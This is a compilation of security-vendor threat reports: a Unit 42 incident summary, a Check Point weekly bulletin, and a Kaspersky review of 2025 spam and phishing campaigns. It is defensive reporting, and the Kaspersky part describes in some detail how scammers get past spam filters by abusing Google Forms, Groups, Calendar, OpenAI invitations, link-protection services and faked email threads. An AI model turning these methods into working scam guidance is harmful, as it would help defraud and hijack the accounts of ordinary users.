  • AI Is Compressing the Attack Timeline: In the fastest cases we investigated, attackers needed just 72 minutes to move from initial access to data exfiltration, 4X faster than last year. We’re seeing AI used in reconnaissance, phishing, scripting and operational execution, which enables machine-like speed at scale.
  • Identity Is Now a Primary Attack Vehicle: Identity weaknesses played a material role in nearly 90% of our investigations. More often than not, attackers aren’t breaking in; they’re logging in with stolen credentials and tokens, and then exploiting fragmented identity estates to escalate privileges and move laterally without triggering traditional defenses.
  • Supply Chain Risk Now Drives Operational Disruption: In 23% of incidents, attackers leveraged third-party SaaS applications. By abusing trusted integrations, vendor tools and application dependencies, they bypassed traditional perimeters and expanded the impact well beyond a single system.
  • Attack Complexity Is Growing: We found that 87% of intrusions involved activity across multiple attack surfaces. Rarely does an attack stay in one environment. Instead, we see coordinated activity across endpoints, networks, cloud, SaaS and identity, forcing defenders to monitor across all of them at once.
  • The Browser Is a Primary Battleground: Nearly 48% of incidents included browser-based activity. This reflects how often modern attacks intersect with routine workflows, like email, web access and day-to-day SaaS use, turning normal user behavior into an attack vector.
  • Extortion Is Moving Beyond Encryption: Encryption-based extortion declined 15% from the year before, as more attackers skip encryption and move straight to data theft and disruption. From the attacker’s perspective, it’s faster, quieter and creates immediate pressure without the signals that defenders once relied on to detect ransomware attacks.

Attacks Succeed Because Exposure Still Beats Sophistication

Despite the speed and automation we’re seeing, most of the incidents we respond to don’t start with something radically new. They start with gaps that show up again and again. In many cases, attackers didn’t rely on a sophisticated exploit, but on an overlooked exposure.

  • Environmental Complexity Undermining Defenses: In over 90% of the incidents we investigated, misconfigurations or gaps in security coverage materially enabled the attack. A big driver of that is tool sprawl. Many organizations are running 50 or more security products, making it extremely difficult to deploy controls consistently or clearly understand what their data is telling them.
  • Visibility Gaps Delay Detection: In many engagements, the signals were there. When we look back forensically, the evidence is in the logs. But during the attack, teams had to stitch together data from multiple disconnected sources, slowing detection during the most critical early minutes.
  • Excessive Trust Expands Impact: Once attackers gain a foothold, overly permissive access and unmanaged tokens frequently let them move farther than they should. We repeatedly see identity trust relationships turn a single compromised account into broad lateral movement and privilege escalation.

Attackers are evolving their tools and tactics, but they still win most often from exploited complexity, limited visibility and excessive trust inside modern enterprise environments.

Recommendations for Security Leaders and Defenders

Across more than 750 frontline investigations, three priorities come up again and again in conversations with CISOs and security teams.

  • Reduce Exposure: Many of the attacks we see begin in places teams didn’t realize were exposed – third-party integrations, unmanaged SaaS connections or everyday browser activity. Reducing exposure means securing the full application ecosystem and treating trusted connections with the same scrutiny as core infrastructure.
  • Reduce Area of Impact: Once attackers get in, the difference between a contained incident and a major disruption often comes down to identity. Tightening identity and access management while removing unnecessary trust limits how far an attacker can move and how much damage they can cause.
  • Increase Response Speed: What happens in the first minutes after initial access can determine whether an incident becomes a breach. Security teams need the visibility to see what’s happening across environments and the ability to use AI to detect, identify and prioritize what matters, so the SOC can contain threats at machine speed, faster than the adversary can move.

Conclusion

Every investigation tells a story. How the attacker got in. How quickly they moved. What made the impact worse. Across hundreds of these cases, patterns emerge. Unit 42 operates 24 hours a day, 7 days a week on the frontlines of these incidents, and each year we distill what we learn into practical guidance. The goal of this report is to turn those frontline lessons into decisions that help you close the gaps that attackers still rely on and stop incidents before they become breaches.

Stay informed. Read the 2026 Unit 42 Global Incident Response Report and download the Executive Resource Kit.

The post 2026 Unit 42 Global Incident Response Report — Attacks Now 4x Faster appeared first on Palo Alto Networks Blog.

  •  

16th February – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 16th February, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • Dutch telecom provider Odido was hit by a data breach following unauthorized access to its customer management system. Attackers extracted personal data of 6.2 million customers, including names, addresses, phone numbers, email addresses, bank account details, dates of birth, and passport or ID numbers.
  • BridgePay Network Solutions, a US payment gateway, has confirmed a ransomware attack that forced it to take core systems offline. The outage disrupted portals for municipalities and merchants nationwide, though initial findings indicate no payment card data exposure and accessed files were encrypted. No ransomware group claimed responsibility for the attack.
  • Flickr, a photo sharing platform, has experienced a security incident at a third-party email service provider on February 5. The exposure may include names, usernames, email addresses, IP addresses, location data, and more. Passwords and payment card numbers were not affected.
  • ApolloMD, a US physician and practice management services firm, has disclosed a breach impacting 626,000 individuals. The incident occurred during May 2025, while the attackers accessed patient information from affiliated practices, exposing data such as names, addresses, and medical details.

AI THREATS

  • Google has released an analysis of adversarial AI misuse, detailing model extraction “distillation” attacks, AI-augmented phishing, and malware experimentation in late 2025. The report identified attempts to coerce disclosure of internal reasoning, AI-assisted reconnaissance by DPRK, PRC, Iranian, and Russian actors, and AI-integrated malware such as HONESTCUE leveraging Gemini’s API for second-stage payload generation.
  • Researchers have investigated a UNC1069 intrusion targeting a cryptocurrency FinTech through AI-enabled social engineering and a fake Zoom ClickFix lure. The attack deployed seven malware families enabling TCC bypass, credential and browser data theft, keystroke logging, and C2 communications over RC4-encrypted configurations.

Check Point Threat Emulation provides protection against this threat (Trojan.Wins.SugarLoader)

  • Researchers have detailed the abuse of AI website builders to clone major brands for phishing and fraud. They analyzed a Malwarebytes lookalike site created using Vercel’s v0 tool, which replicated branding and integrated opaque PayPal payment flows. The domain leveraged SEO poisoning and spam links, with registration data indicating links to India.

VULNERABILITIES AND PATCHES

  • Microsoft has released its February 2026 Patch Tuesday updates. The release addresses 58 vulnerabilities, including six zero days under active exploitation, among them CVE-2026-21510, a Windows Shell Security Feature Bypass vulnerability that can be triggered by opening a specially crafted link or shortcut file. Successful exploitation requires convincing a user to open a malicious link or shortcut file.
  • Google has patched 11 vulnerabilities in Chrome 145 for Windows, macOS, and Linux, including CVE-2026-2313, a use-after-free vulnerability in CSS. This high-severity flaw could allow remote code execution. Two additional high severity bugs in Codecs (CVE-2026-2314) and WebGPU (CVE-2026-2315) also enable code execution.
  • BeyondTrust has addressed CVE-2026-1731, a CVSS 9.9 pre-authentication remote code execution flaw in Remote Support and older Privileged Remote Access versions. Shortly after a proof of concept was published, threat actors began exploiting exposed instances, prompting urgent upgrades for self-hosted deployments.

Check Point IPS provides protection against this threat (BeyondTrust Multiple Products Command Injection (CVE-2026-1731))

THREAT INTELLIGENCE REPORTS

  • Check Point Research analyzed global cyber-attacks in January averaging 2,090 per organization per week, up 3% from December and 17% year over year. Education remained the most targeted sector with 4,364 attacks per organization, ransomware recorded 678 incidents with 52% in North America, and 1 in 30 GenAI prompts posed high data leak risk.
  • Check Point Research identified a sharp increase in Valentine-themed phishing websites, fraudulent stores, and fake dating platforms designed to steal personal data and payment information. Valentine-related domain registrations rose 44% in January 2026, with 97.5% unclassified, while 710 Tinder-impersonating domains were detected.
  • A Phorpiex-driven phishing campaign has been observed delivering Global Group ransomware via ZIP attachments with double-extension LNK files, using CMD and PowerShell to execute the payload. The ransomware runs offline with locally generated ChaCha20-Poly1305 keys, deletes shadow copies and itself, and terminates analysis and database processes.
  • Researchers have analyzed the latest GuLoader (aka CloudEye) downloader, which delivers Remcos, Vidar, and Raccoon, and now evades detection by leveraging encrypted payloads hosted on Google Drive and OneDrive. The malware uses polymorphic code to generate constants via XOR and ADD/SUB operations, along with anti-analysis techniques such as sandbox checks and exception handlers.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Trojan.Wins.GuLoader; InfoStealer.Win.GuLoader; Dropper.Wins.GuLoader.ta.*; Dropper.Win.CloudEyE; RAT.Wins.Remcos; InfoStealer.Win.Vidar; InfoStealer.Win.Raccoon; InfoStealer.Wins.Raccoon)

The post 16th February – Threat Intelligence Report appeared first on Check Point Research.

  •  

Spam and phishing in 2025

The year in figures

  • 44.99% of all emails sent worldwide and 43.27% of all emails sent in the Russian web segment were spam
  • 32.50% of all spam emails were sent from Russia
  • Kaspersky Mail Anti-Virus blocked 144,722,674 malicious email attachments
  • Our Anti-Phishing system thwarted 554,002,207 attempts to follow phishing links

Phishing and scams in 2025

Entertainment-themed phishing attacks and scams

In 2025, online streaming services remained a primary theme for phishing sites within the entertainment sector, typically by offering early access to major premieres ahead of their official release dates. Alongside these, there was a notable increase in phishing pages mimicking ticket aggregation platforms for live events. Cybercriminals lured users with offers of free tickets to see popular artists on pages that mirrored the branding of major ticket distributors. To participate in these “promotions”, victims were required to pay a nominal processing or ticket-shipping fee. Naturally, after paying the fee, the users never received any tickets.

In addition to concert-themed bait, other music-related scams gained significant traction. Users were directed to phishing pages and prompted to “vote for their favorite artist”, a common activity within fan communities. To bolster credibility, the scammers leveraged the branding of major companies like Google and Spotify. This specific scheme was designed to harvest credentials for multiple platforms simultaneously, as users were required to sign in with their Facebook, Instagram, or email credentials to participate.

As a pretext for harvesting Spotify credentials, attackers offered users a way to migrate their playlists to YouTube. To complete the transfer, victims were to just enter their Spotify credentials.

Beyond standard phishing, threat actors leveraged Spotify’s popularity for scams. In Brazil, scammers promoted a scheme where users were purportedly paid to listen to and rate songs.

To “withdraw” their earnings, users were required to provide their identification number for PIX, Brazil’s instant payment system.

Users were then prompted to verify their identity. To do so, the victim was required to make a small, one-time “verification payment”, an amount significantly lower than the potential earnings.

The form for submitting this “verification payment” was designed to appear highly authentic, even requesting various pieces of personal data. It is highly probable that this data was collected for use in subsequent attacks.

In another variation, users were invited to participate in a survey in exchange for a $1000 gift card. However, in a move typical of a scam, the victim was required to pay a small processing or shipping fee to claim the prize. Once the funds were transferred, the attackers vanished, and the website was taken offline.

Even deciding to go to an art venue with a girl from a dating site could result in financial loss. In this scenario, the “date” would suggest an in-person meeting after a brief period of rapport-building. They would propose a relatively inexpensive outing, such as a movie or a play at a niche theater. The scammer would go so far as to provide a link to a specific page where the victim could supposedly purchase tickets for the event.

To enhance the site’s perceived legitimacy, it even prompted the user to select their city of residence.

However, once the “ticket payment” was completed, both the booking site and the individual from the dating platform would vanish.

A similar tactic was employed by scam sites selling tickets for escape rooms. The design of these pages closely mirrored legitimate websites to lower the target’s guard.

Phishing pages masquerading as travel portals often capitalize on a sense of urgency, betting that a customer eager to book a “last-minute deal” will overlook an illegitimate URL. For example, the fraudulent page shown below offered exclusive tours of Japan, purportedly from a major Japanese tour operator.

Sensitive data at risk: phishing via government services

To harvest users’ personal data, attackers utilized a traditional phishing framework: fraudulent forms for document processing on sites posing as government portals. The visual design and content of these phishing pages meticulously replicated legitimate websites, offering the same services found on official sites. In Brazil, for instance, attackers collected personal data from individuals under the pretext of issuing a Rural Property Registration Certificate (CCIR).

Through this method, fraudsters tried to gain access to the victim’s highly sensitive information, including their individual taxpayer registry (CPF) number. This identifier serves as a unique key for every Brazilian national to access private accounts on government portals. It is also utilized in national databases and displayed on personal identification documents, making its interception particularly dangerous. Scammer access to this data poses a severe risk of identity theft, unauthorized access to government platforms, and financial exposure.

Furthermore, users were at risk of direct financial loss: in certain instances, the attackers requested a “processing fee” to facilitate the issuance of the important document.

Fraudsters also employed other methods to obtain CPF numbers. Specifically, we discovered phishing pages mimicking the official government service portal, which requires the CPF for sign-in.

Another theme exploited by scammers involved government payouts. In 2025, Singaporean citizens received government vouchers ranging from $600 to $800 in honor of the country’s 60th anniversary. To redeem these, users were required to sign in to the official program website. Fraudsters rushed to create web pages designed to mimic this site. Interestingly, the primary targets in this campaign were Telegram accounts, despite the fact that Telegram credentials were not a requirement for signing in to the legitimate portal.

We also identified a scam targeting users in Norway who were looking to renew or replace their driver’s licenses. Upon opening a website masquerading as the official Norwegian Public Roads Administration website, visitors were prompted to enter their vehicle registration and phone numbers.

Next, the victim was prompted for sensitive data, such as the personal identification number unique to every Norwegian citizen. By doing so, the attackers not only gained access to confidential information but also reinforced the illusion that the victim was interacting with an official website.

Once the personal data was submitted, a fraudulent page would appear, requesting a “processing fee” of 1200 kroner. If the victim entered their credit card details, the funds were transferred directly to the scammers with no possibility of recovery.

In Germany, attackers used the pretext of filing tax returns to trick users into providing their email user names and passwords on phishing pages.

A call to urgent action is a classic tactic in phishing scenarios. When combined with the threat of losing property, these schemes become highly effective bait, distracting potential victims from noticing an incorrect URL or a poorly designed website. For example, a phishing warning regarding unpaid vehicle taxes was used as a tool by attackers targeting credentials for the UK government portal.

We have observed that since the spring of 2025, there has been an increase in emails mimicking automated notifications from the Russian government services portal. These messages were distributed under the guise of application status updates and contained phishing links.

We also recorded vishing attacks targeting users of government portals. Victims were prompted to “verify account security” by calling a support number provided in the email. To lower the users’ guard, the attackers included fabricated technical details in the emails, such as the IP address, device model, and timestamp of an alleged unauthorized sign-in.

Last year, attackers also disguised vishing emails as notifications from microfinance institutions or credit bureaus regarding new loan applications. The scammers banked on the likelihood that the recipient had not actually applied for a loan. They would then prompt the victim to contact a fake support service via a spoofed support number.

Know Your Customer

As an added layer of data security, many services now implement biometric verification (facial recognition, fingerprints, and retina scans), as well as identity document verification and digital signatures. To harvest this data, fraudsters create clones of popular platforms that utilize these verification protocols. We have previously detailed the mechanics of this specific type of data theft.

In 2025, we observed a surge in phishing attacks targeting users under the guise of Know Your Customer (KYC) identity verification. KYC protocols rely on a specific set of user data for identification. By spoofing the pages of payment services such as Vivid Money, fraudsters harvested the information required to pass KYC authentication.

Notably, this threat also impacted users of various other platforms that utilize KYC procedures.

A distinctive feature of attacks on the KYC process is that, in addition to the victim’s full name, email address, and phone number, phishers request photos of their passport or face, sometimes from multiple angles. If this information falls into the hands of threat actors, the consequences extend beyond the loss of account access; the victim’s credentials can be sold on dark web marketplaces, a trend we have highlighted in previous reports.

Messaging app phishing

Account hijacking on messaging platforms like WhatsApp and Telegram remains one of the primary objectives of phishing and scam operations. While traditional tactics, such as suspicious links embedded in messages, have been well-known for some time, the methods used to steal credentials are becoming increasingly sophisticated.

For instance, Telegram users were invited to participate in a prize giveaway purportedly hosted by a famous athlete. This phishing attack, which masqueraded as an NFT giveaway, was executed through a Telegram Mini App. This marks a shift in tactics, as attackers previously relied on external web pages for these types of schemes.

In 2025, new variations emerged within the familiar framework of distributing phishing links via Telegram. For example, we observed prompts inviting users to vote for the “best dentist” or “best COO” in town.

The most prevalent theme in these voting-based schemes, children’s contests, was distributed primarily through WhatsApp. These phishing pages showed little variety; attackers utilized a standardized website design and set of “bait” photos, simply localizing the language based on the target audience’s geographic location.

To participate in the vote, the victim was required to enter the phone number linked to their WhatsApp account.

They were then prompted to provide a one-time authentication code for the messaging app.

The following are several other popular methods used by fraudsters to hijack user credentials.

In China, phishing pages meticulously replicated the WhatsApp interface. Victims were notified that their accounts had purportedly been flagged for “illegal activity”, necessitating “additional verification”.

The victim was redirected to a page to enter their phone number, followed by a request for their authorization code.

In other instances, users received messages allegedly from WhatsApp support regarding account authentication via SMS. As with the other scenarios described, the attackers’ objective was to obtain the authentication code required to hijack the account.

Fraudsters enticed WhatsApp users with an offer to link an app designed to “sync communications” with business contacts.

To increase the perceived legitimacy of the phishing site, the attackers even prompted users to create custom credentials for the page.

After that, the user was required to “purchase a subscription” to activate the application. This allowed the scammers to harvest credit card data, leaving the victim without the promised service.

To lure Telegram users, phishers distributed invitations to online dating chats.

Attackers also heavily leveraged the promise of free Telegram Premium subscriptions. While these phishing pages were previously observed only in Russian and English, the linguistic scope of these campaigns expanded significantly this year. As in previous iterations, activating the subscription required the victim to sign in to their account, which could result in the loss of account access.

Exploiting the ChatGPT hype

Artificial intelligence is increasingly being leveraged by attackers as bait. For example, we have identified fraudulent websites mimicking the official payment page for ChatGPT Plus subscriptions.

Social media marketing through LLMs was also a potential focal point for user interest. Scammers offered “specialized prompt kits” designed for social media growth; however, once payment was received, they vanished, leaving victims without the prompts or their money.

The promise of easy income through neural networks has emerged as another tactic to attract potential victims. Fraudsters promoted using ChatGPT to place bets, promising that the bot would do all the work while the user collected the profits. These services were offered at a “special price” valid for only 15 minutes after the page was opened. This narrow window prevented the victim from critically evaluating the impulse purchase.

Job opportunities with a catch

To attract potential victims, scammers exploited the theme of employment by offering high-paying remote positions. Applicants responding to these advertisements did more than just disclose their personal data; in some cases, fraudsters requested a small sum under the pretext of document processing or administrative fees. To convince victims that the offer was legitimate, attackers impersonated major brands, leveraging household names to build trust. This allowed them to lower the victims’ guard, even when the employment terms sounded too good to be true.

We also observed schemes where, after obtaining a victim’s data via a phishing site, scammers would follow up with a phone call – a tactic aimed at tricking the user into disclosing additional personal data.

By analyzing current job market trends, threat actors also targeted popular career paths to steal messaging app credentials. These phishing schemes were tailored to specific regional markets. For example, in the UAE, fake “employment agency” websites were circulating.

In a more sophisticated variation, users were asked to complete a questionnaire that required the phone number linked to their Telegram account.

To complete the registration, users were prompted for a code which, in reality, was a Telegram authorization code.

Notably, the registration process did not end there; the site continued to request additional information to “set up an account” on the fraudulent platform. This served to keep victims in the dark, maintaining their trust in the malicious site’s perceived legitimacy.

After finishing the registration, the victim was told to wait 24 hours for “verification”, though the scammers’ primary objective, hijacking the Telegram account, had already been achieved.

Simpler phishing schemes were also observed, where users were redirected to a page mimicking the Telegram interface. By entering their phone number and authorization code, victims lost access to their accounts.

Job seekers were not the only ones targeted by scammers. Employers’ accounts were also in the crosshairs, specifically on a major Russian recruitment portal. On a counterfeit page, the victim was asked to “verify their account” in order to post a job listing, which required them to enter their actual sign-in credentials for the legitimate site.

Spam in 2025

Malicious attachments

Password-protected archives

Attackers began aggressively distributing messages with password-protected malicious archives in 2024. Throughout 2025, these archives remained a popular vector for spreading malware, and we observed a variety of techniques designed to bypass security solutions.

For example, threat actors sent emails impersonating law firms, threatening victims with legal action over alleged “unauthorized domain name use”. The recipient was prompted to review potential pre-trial settlement options detailed in an attached document. The attachment consisted of an unprotected archive containing a secondary password-protected archive and a file with the password. Disguised as a legal document within this inner archive was a malicious WSF file, which installed a Trojan into the system via startup. The Trojan then stealthily downloaded and installed Tor, which allowed it to regularly exfiltrate screenshots to the attacker-controlled C2 server.

In addition to archives, we also encountered password-protected PDF files containing malicious links over the past year.

E-signature service exploits

Emails using the pretext of “signing a document” to coerce users into clicking phishing links or opening malicious attachments were quite common in 2025. The most prevalent scheme involved fraudulent notifications from electronic signature services. While these were primarily used for phishing, one specific malware sample identified within this campaign is of particular interest.

The email, purportedly sent from a well-known document-sharing platform, notified the recipient that they had been granted access to a “contract” attached to the message. However, the attachment was not the expected PDF; instead, it was a nested email file named after the contract. The body of this nested message mirrored the original, but its attachment utilized a double extension: a malicious SVG file containing a Trojan was disguised as a PDF document. This multi-layered approach was likely an attempt to obfuscate the malware and bypass security filters.

“Business correspondence” impersonating industrial companies

In the summer of last year, we observed mailshots sent in the name of various existing industrial enterprises. These emails contained DOCX attachments embedded with Trojans. Attackers coerced victims into opening the malicious files under the pretext of routine business tasks, such as signing a contract or drafting a report.

The authors of this malicious campaign attempted to lower users’ guard by using legitimate industrial sector domains in the “From” address. Furthermore, the messages were routed through the mail servers of a reputable cloud provider, ensuring the technical metadata appeared authentic. Consequently, even a cautious user could mistake the email for a genuine communication, open the attachment, and compromise their device.

Attacks on hospitals

Hospitals were a popular target for threat actors this past year: they were targeted with malicious emails impersonating well-known insurance providers. Recipients were threatened with legal action regarding alleged “substandard medical services”. The attachments, described as “medical records and a written complaint from an aggrieved patient”, were actually malware. Our solutions detect this threat as Backdoor.Win64.BrockenDoor, a backdoor capable of harvesting system information and executing malicious commands on the infected device.

We also came across emails with a different narrative. In those instances, medical staff were requested to facilitate a patient transfer from another hospital for ongoing observation and treatment. These messages referenced attached medical files containing diagnostic and treatment history, which were actually archives containing malicious payloads.

To bolster the perceived legitimacy of these communications, attackers did more than just impersonate famous insurers and medical institutions; they registered look-alike domains that mimicked official organizations’ domains by appending keywords such as “-insurance” or “-med.” Furthermore, to lower the victims’ guard, scammers included a fake “Scanned by Email Security” label.

Messages containing instructions to run malicious scripts

Last year, we observed unconventional infection chains targeting end-user devices. Threat actors continued to distribute instructions for downloading and executing malicious code, rather than attaching the malware files directly. To convince the recipient to follow these steps, attackers typically utilized a lure involving a “critical software update” or a “system patch” to fix a purported vulnerability. Generally, the first step in the instructions required launching the command prompt with administrative privileges, while the second involved entering a command to download and execute the malware: either a script or an executable file.

In some instances, these instructions were contained within a PDF file. The victim was prompted to copy a command into PowerShell that was neither obfuscated nor hidden. Such schemes target non-technical users who would likely not understand the command’s true intent and would unknowingly infect their own devices.

Scams

Law enforcement impersonation scams in the Russian web segment

In 2025, extortion campaigns involving actors posing as law enforcement – a trend previously more prevalent in Europe – were adapted to target users across the Commonwealth of Independent States.

For example, we identified messages disguised as criminal subpoenas or summonses purportedly issued by Russian law enforcement agencies. However, the specific departments cited in these emails never actually existed. The content of these “summonses” would also likely raise red flags for a cautious user. This blackmail scheme relied on the victim, in their state of panic, not scrutinizing the contents of the fake summons.

To intimidate recipients, the attackers referenced legal frameworks and added forged signatures and seals to the “subpoenas”. In reality, neither the cited statutes nor the specific civil service positions exist in Russia.

We observed similar attacks – employing fabricated government agencies and fictitious legal acts – in other CIS countries, such as Belarus.

Fraudulent investment schemes

Threat actors continued to aggressively exploit investment themes in their email scams. These emails typically promise stable, remote income through “exclusive” investment opportunities. This remains one of the most high-volume and adaptable categories of email scams. Threat actors embedded fraudulent links both directly within the message body and inside various types of attachments: PDF, DOC, PPTX, and PNG files. Furthermore, they increasingly leveraged legitimate Google services, such as Google Docs, YouTube, and Google Forms, to distribute these communications. The link led to the site of the “project” where the victim was prompted to provide their phone number and email. Subsequently, users were invited to invest in a non-existent project.

We have previously documented these mailshots: they were originally targeted at Russian-speaking users and were primarily distributed under the guise of major financial institutions. However, in 2025, this investment-themed scam expanded into other CIS countries and Europe. Furthermore, the range of industries that spammers impersonated grew significantly. For instance, in their emails, attackers began soliciting investments for projects supposedly led by major industrial-sector companies in Kazakhstan and the Czech Republic.

Fraudulent “brand partner” recruitment

This specific scam operates through a multi-stage workflow. First, the target company receives a communication from an individual claiming to represent a well-known global brand, inviting them to register as a certified supplier or business partner. To bolster the perceived authenticity of the offer, the fraudsters send the victim an extensive set of forged documents. Once these documents are signed, the victim is instructed to pay a “deposit”, which the attackers claim will be fully refunded once the partnership is officially established.

These mailshots were first detected in 2025 and have rapidly become one of the most prevalent forms of email-based fraud. In December 2025 alone, we blocked over 80,000 such messages. These campaigns specifically targeted the B2B sector and were notable for their high level of variation – ranging from their technical properties to the diversity of the message content and the wide array of brands the attackers chose to impersonate.

Fraudulent overdue rent notices

Last year, we identified a new theme in email scams: recipients were notified that the payment deadline for a leased property had expired and were urged to settle the “debt” immediately. To prevent the victim from sending funds to their actual landlord, the email claimed that banking details had changed. The “debtor” was then instructed to request the new payment information – which, of course, belonged to the fraudsters. These mailshots primarily targeted French-speaking countries; however, in December 2025, we discovered a similar scam variant in German.

QR codes in scam letters

In 2025, we observed a trend where QR codes were utilized not only in phishing attempts but also in extortion emails. In a classic blackmail scam, the user is typically intimidated by claims that hackers have gained access to sensitive data. To prevent the public release of this information, the attackers demand a ransom payment to their cryptocurrency wallet.

Previously, to bypass email filters, scammers attempted to obfuscate the wallet address by using various noise contamination techniques. In last year’s campaigns, however, scammers shifted to including a QR code that contained the cryptocurrency wallet address.

News agenda

As in previous years, spammers in 2025 aggressively integrated current events into their fraudulent messaging to increase engagement.

For example, following the launch of $TRUMP memecoins surrounding Donald Trump’s inauguration, we identified scam campaigns promoting the “Trump Meme Coin” and “Trump Digital Trading Cards”. In these instances, scammers enticed victims to click a link to claim “free NFTs”.

We also observed ads offering educational credentials. Spammers posted these ads as comments on legacy, unmoderated forums; this tactic ensured that notifications were automatically pushed to all users subscribed to the thread. These notifications either displayed the fraudulent link directly in the comment preview or alerted users to a new post that redirected them to spammers’ sites.

In the summer, when the wedding of Amazon founder Jeff Bezos became a major global news story, users began receiving Nigerian-style scam messages purportedly from Bezos himself, as well as from his former wife, MacKenzie Scott. These emails promised recipients substantial sums of money, framed either as charitable donations or corporate compensation from Amazon.

During the BLACKPINK world tour, we observed a wave of spam advertising “luggage scooters”. The scammers claimed these were the exact motorized suitcases used by the band members during their performances.

Finally, in the fall of 2025, traditionally timed to coincide with the launch of new iPhones, we identified scam campaigns featuring surveys that offered participants a chance to “win” a fictitious iPhone 17 Pro.

After completing a brief survey, the user was prompted to provide their contact information and physical address, as well as pay a “delivery fee” – which was the scammers’ ultimate objective. Upon entering their credit card details into the fraudulent site, the victim risked losing not only the relatively small delivery charge but also the entire balance in their bank account.

The widespread popularity of Ozempic was also reflected in spam campaigns; users were bombarded with offers to purchase versions of the drug or questionable alternatives.

Localized news events also fall under the scrutiny of fraudsters, serving as the basis for scam narratives. For instance, last summer, coinciding with the opening of the tax season in South Africa, we began detecting phishing emails impersonating the South African Revenue Service (SARS). These messages notified taxpayers of alleged “outstanding balances” that required immediate settlement.

Methods of distributing email threats

Google services

In 2025, threat actors increasingly leveraged various Google services to distribute email-based threats. We observed the exploitation of Google Calendar: scammers would create an event containing a WhatsApp contact number in the description and send an invitation to the target. For instance, companies received emails regarding product inquiries that prompted them to move the conversation to the messaging app to discuss potential “collaboration”.

Spammers employed a similar tactic using Google Classroom. We identified samples offering SEO optimization services that likewise directed victims to a WhatsApp number for further communication.

We also detected the distribution of fraudulent links via legitimate YouTube notifications. Attackers would reply to user comments under various videos, triggering an automated email notification to the victim. This email contained a link to a video that displayed only a message urging the viewer to “check the description”, where the actual link to the scam site was located. As the victim received an email containing the full text of the fraudulent comment, they were often lured through this chain of links, eventually landing on the scam site.

Over the past two years or so, there has been a significant rise in attacks utilizing Google Forms. Fraudsters create a survey with an enticing title and place the scam messaging directly in the form’s description. They then submit the form themselves, entering the victims’ email addresses into the field for the respondent email. This triggers legitimate notifications from the Google Forms service to the targeted addresses. Because these emails originate from Google’s own mail servers, they appear authentic to most spam filters. The attackers rely on the victim focusing on the “bait” description containing the fraudulent link rather than the standard form header.

Google Groups also emerged as a popular tool for spam distribution last year. Scammers would create a group, add the victims’ email addresses as members, and broadcast spam through the service. This scheme proved highly effective: even if a security solution blocked the initial spam message, the user could receive a deluge of automated replies from other addresses on the member list.

At the end of 2025, we encountered a legitimate email in terms of technical metadata that was sent via Google and contained a fraudulent link. The message also included a verification code for the recipient’s email address. To generate this notification, scammers filled out the account registration form in a way that diverted the recipient’s attention toward a fraudulent site. For example, instead of entering a first and last name, the attackers inserted text such as “Personal Link” followed by a phishing URL, utilizing noise contamination techniques. By entering the victim’s email address into the registration field, the scammers triggered a legitimate system notification containing the fraudulent link.

OpenAI

In addition to Google services, spammers leveraged other platforms to distribute email threats, notably OpenAI, riding the wave of artificial intelligence popularity. In 2025, we observed emails sent via the OpenAI platform into which spammers had injected short messages, fraudulent links, or phone numbers.

This occurs during the account registration process on the OpenAI platform, where users are prompted to create an organization to generate an API key. Spammers placed their fraudulent content directly into the field designated for the organization’s name. They then added the victims’ email addresses as organization members, triggering automated platform invitations that delivered the fraudulent links or contact numbers directly to the targets.

Spear phishing and BEC attacks in 2025

QR codes

The use of QR codes in spear phishing has become a conventional tactic that threat actors continued to employ throughout 2025. Specifically, we observed the persistence of a major trend identified in our previous report: the distribution of phishing documents disguised as notifications from a company’s HR department.

In these campaigns, attackers impersonated HR team members, requesting that employees review critical documentation, such as a new corporate policy or code of conduct. These documents were typically attached to the email as PDF files.

Phishing notification about "new corporate policies"

Phishing notification about “new corporate policies”

To maintain the ruse, the PDF document contained a highly convincing call to action, prompting the user to scan a QR code to access the relevant file. While attackers previously embedded these codes directly into the body of the email, last year saw a significant shift toward placing them within attachments – most likely in an attempt to bypass email security filters.

Malicious PDF content

Malicious PDF content

Upon scanning the QR code within the attachment, the victim was redirected to a phishing page meticulously designed to mimic a Microsoft authentication form.

Phishing page with an authentication form

Phishing page with an authentication form

In addition to fraudulent HR notifications, threat actors created scheduled meetings within the victim’s email calendar, placing DOC or PDF files containing QR codes in the event descriptions. Leveraging calendar invites to distribute malicious links is a legacy technique that was widely observed during scam campaigns in 2019. After several years of relative dormancy, we saw a resurgence of this technique last year, now integrated into more sophisticated spear phishing operations.

Fake meeting invitation

Fake meeting invitation

In one specific example, the attachment was presented as a “new voicemail” notification. To listen to the recording, the user was prompted to scan a QR code and sign in to their account on the resulting page.

Malicious attachment content

Malicious attachment content

As in the previous scenario, scanning the code redirected the user to a phishing page, where they risked losing access to their Microsoft account or internal corporate sites.

Link protection services

Threat actors utilized more than just QR codes to hide phishing URLs and bypass security checks. In 2025, we discovered that fraudsters began weaponizing link protection services for the same purpose. The primary function of these services is to intercept and scan URLs at the moment of clicking to prevent users from reaching phishing sites or downloading malware. However, attackers are now abusing this technology by generating phishing links that security systems mistakenly categorize as “safe”.

This technique is employed in both mass and spear phishing campaigns. It is particularly dangerous in targeted attacks, which often incorporate employees’ personal data and mimic official corporate branding. When combined with these characteristics, a URL generated through a legitimate link protection service can significantly bolster the perceived authenticity of a phishing email.

"Protected" link in a phishing email

“Protected” link in a phishing email

After opening a URL that seemed safe, the user was directed to a phishing site.

Phishing page

Phishing page

BEC and fabricated email chains

In Business Email Compromise (BEC) attacks, threat actors have also begun employing new techniques, the most notable of which is the use of fake forwarded messages.

BEC email featuring a fabricated message thread

BEC email featuring a fabricated message thread

This BEC attack unfolded as follows. An employee would receive an email containing a previous conversation between the sender and another colleague. The final message in this thread was typically an automated out-of-office reply or a request to hand off a specific task to a new assignee. In reality, however, the entire initial conversation with the colleague was completely fabricated. These messages lacked the thread-index headers, as well as other critical header values, that would typically verify the authenticity of an actual email chain.

In the example at hand, the victim was pressured to urgently pay for a license using the provided banking details. The PDF attachments included wire transfer instructions and a counterfeit cover letter from the bank.

Malicious PDF content

Malicious PDF content

The bank does not actually have an office at the address provided in the documents.

Statistics: phishing

In 2025, Kaspersky solutions blocked 554,002,207 attempts to follow fraudulent links. In contrast to the trends of previous years, we did not observe any major spikes in phishing activity; instead, the volume of attacks remained relatively stable throughout the year, with the exception of a minor decline in December.

Anti-Phishing triggers, 2025 (download)

